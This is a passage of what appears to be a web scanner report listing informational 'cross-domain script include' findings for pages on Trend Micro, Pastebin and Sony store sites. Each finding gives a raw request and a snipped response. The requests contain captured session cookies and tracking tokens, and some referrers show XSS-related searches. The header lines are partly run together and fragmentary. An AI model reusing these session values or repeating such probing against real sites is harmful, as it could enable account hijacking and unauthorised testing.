bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fa-snapshot-of-android-threats-infographic%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22t%22%3A1315351002628%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22l%22%3A%22Exploits%22%2C%22de%22%3A%7B%22su%22%3A%22In%20January%20this%20year%2C%20Trend%20Micro%20chairman%20and%20co-founder%20Steve%20Chang%20was%20quoted%20as%20saying%20that%20Android-based%20devices%20are%20less%20secure%20than%20those%20running%20on%20iOS.%22%2C%22ti%22%3A%22A%20Snapshot%20of%20Android%20Threats%20%5BINFOGRAPHIC%5D%20%7C%20Malware%20Blog%20%7C%20Trend%20Micro%22%2C%22nw%22%3A813%2C%22nl%22%3A120%7D%7D
Response
HTTP/1.1 200 OK.com/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... <script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.5. http://blog.trendmicro.com/category/pharming/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/category/pharming/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://widgets.twimg.com/j/2/widget.js
Request
GET /category/pharming/ HTTP/1.1.com//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.8.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=8; bn_u=6923713914570485926; cmRS=&t1=1315351074117&t2=1315351076030&t3=1315351267076&t4=1315351071147<i=1315351267076&ln=&hr=/category/pharming/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/&rf=http%3A//blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK.com/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... <script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.6. http://blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/trend-micro-researchers-identify-vulnerability-in-hotmail/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share http://widgets.twimg.com/j/2/widget.js
Request
GET /trend-micro-researchers-identify-vulnerability-in-hotmail/ HTTP/1.1.com/category/exploits//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.6.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=6; bn_u=6923713914570485926; cmRS=&t1=1315351031684&t2=1315351033496&t3=1315351039900&t4=1315351030127<i=1315351039899&ln=&hr=/trend-micro-researchers-identify-vulnerability-in-hotmail/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/category/exploits/&rf=http%3A//blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fblackhat-2011-dangers-of-embedded-web-servers%2F%22%2C%22t%22%3A1315351039907%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22de%22%3A%7B%22ti%22%3A%22Exploits%20%7C%20TrendLabs%20%7C%20Malware%20Blog%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A910%2C%22nl%22%3A117%7D%7D
Response
HTTP/1.1 200 OK.com/xmlrpc.php.com/34090>; rel=shortlink.com/?p=34090>; rel=shortlink/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" ...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... <script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.7. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/wp-content/plugins/flash-gallery/js/addOnLoad.js
Issue detail
The response dynamically includes the following script from another domain:
Request
GET /wp-content/plugins/flash-gallery/js/addOnLoad.js?ver=1 HTTP/1.1.com/?p=12640;q=0.3.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D
Response
HTTP/1.1 200 OK".wordpress.org/changeset/6482*/(function(){var e=[],t,s,n,i,o,d=document,w=window,r='readyState',c='onreadystatechange',x=functi...[SNIP]... (i=e.shift())i();if(s)s[c]=''};return function(f){if(n)return f();if(!e[0]){d.addEventListener&&d.addEventListener("DOMContentLoaded",x,false);/*@cc_on@*//*@if(@_win32)d.write("<script id=__ie_onload defer src=//0> <\/scr"+"ipt>...[SNIP]...
13.8. http://pastebin.com/bq8xJPMn
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/bq8xJPMn
Issue detail
The response dynamically includes the following scripts from other domains:http://edge.quantserve.com/quant.js http://lolbin.net/stats.php http://platform.twitter.com/widgets.js http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js
Request
GET /bq8xJPMn HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"> </script>...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... <script type="text/javascript" src="http://lolbin.net/stats.php"> </script>...[SNIP]...
13.9. http://pastebin.com/etc/ads/iframes/160x600.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/160x600.html
Issue detail
The response dynamically includes the following script from another domain:http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js
Request
GET /etc/ads/iframes/160x600.html HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"> </script>...[SNIP]...
13.10. http://pastebin.com/etc/ads/iframes/728x90.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/728x90.html
Issue detail
The response dynamically includes the following script from another domain:http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js
Request
GET /etc/ads/iframes/728x90.html HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"> </script>...[SNIP]...
13.11. http://pastebin.com/etc/social/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/social/index.html
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js https://apis.google.com/js/plusone.js
Request
GET /etc/social/index.html HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="https://apis.google.com/js/plusone.js"> </script><script src="http://connect.facebook.net/en_US/all.js#appId=150549571626327&xfbml=1"> </script>...[SNIP]...
13.12. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/CategoryDisplay
Issue detail
The response dynamically includes the following script from another domain:http://nexus2.ensighten.com/sony/Bootstrap.js
Request
GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167 HTTP/1.1/SonySearch/Search?action=search&ti=0&pst=&pti=&first=1&st=xss+playstation/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s; sifrFetch=true; s_visit=1; s_sq=%5B%5BB%5D%5D; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.1.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; mbox=check#true#1315352981|session#1315352920400-736912#1315354781|PC#1315334914578-928682.19#1316562527; s_cc=true
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> ...[SNIP]...
13.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The response dynamically includes the following script from another domain:http://nexus2.ensighten.com/sony/Bootstrap.js
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK/html4/strict.dtd">-Compatible" content="IE=8" /><script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> ...[SNIP]...
13.14. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/StoreCatalogDisplay
Issue detail
The response dynamically includes the following script from another domain:http://nexus2.ensighten.com/sony/Bootstrap.js
Request
GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">-Compatible" content="IE=8" /><script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> ...[SNIP]...
13.15. https://store.trendmicro.com/DRHM/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/store
Issue detail
The response dynamically includes the following scripts from other domains:https://display.digitalriver.com/?aid=244&tax=trend_micro https://drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js https://libs.coremetrics.com/eluminate.js https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en
Request
GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US HTTP/1.1.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK.1.2.0.2 (TN;ecid=24051346139,0)/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"> </script>...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js"> </script>...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"> </script>...[SNIP]... <script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js" type="text/javascript"> </script>...[SNIP]... <script src=https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en> </script>...[SNIP]... <script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"> ...[SNIP]... ############## --><script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"> </script>...[SNIP]...
13.16. https://store.trendmicro.com/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/store
Issue detail
The response dynamically includes the following scripts from other domains:https://display.digitalriver.com/?aid=244&tax=trend_micro https://drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js https://libs.coremetrics.com/eluminate.js https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0
Request
GET /store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.2.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713914570485926; 